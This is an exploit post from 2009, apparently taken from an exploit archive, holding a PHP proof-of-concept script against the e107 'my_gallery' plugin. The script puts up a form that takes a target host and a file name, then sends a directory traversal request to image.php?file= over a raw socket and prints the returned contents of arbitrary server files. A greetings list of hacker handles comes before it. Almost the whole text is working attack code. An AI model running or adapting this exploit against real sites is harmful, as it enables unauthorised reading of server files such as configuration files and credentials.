mygallery-disclose.txt
Posted on 23 July 2009
MainHack BrotherHood [ http://news.serverisdown.org ] Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang H312Y yooogy mousekill }^-^{ loqsa zxvf martfella skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke FUCK TERORIS!! */ $vuln = '/e107_plugins/my_gallery/image.php?file='; $trasv = '/../../../../../../../../../../../../../../..'; echo "<form method=POST> Web 2 XPL : <input type="text" name="host" size=30> File 2 Read : <input type="text" name="file" size=30> <input type=submit value="Go!!!" name="_xpl"> <br><br>"; if ($_POST['_xpl']) { $data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1 "; $data .= "Host: {$host} "; $data .= "Connection: close "; $html = sendpacket($host,$data); print '<pre>'.htmlspecialchars($html).'</pre>'; } echo "</form>"; function sendpacket($host,$data) { if (!$sock = @fsockopen($host,80)) { die("[!] Connection refused, try again! "); } fputs($sock,$data); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } ?>
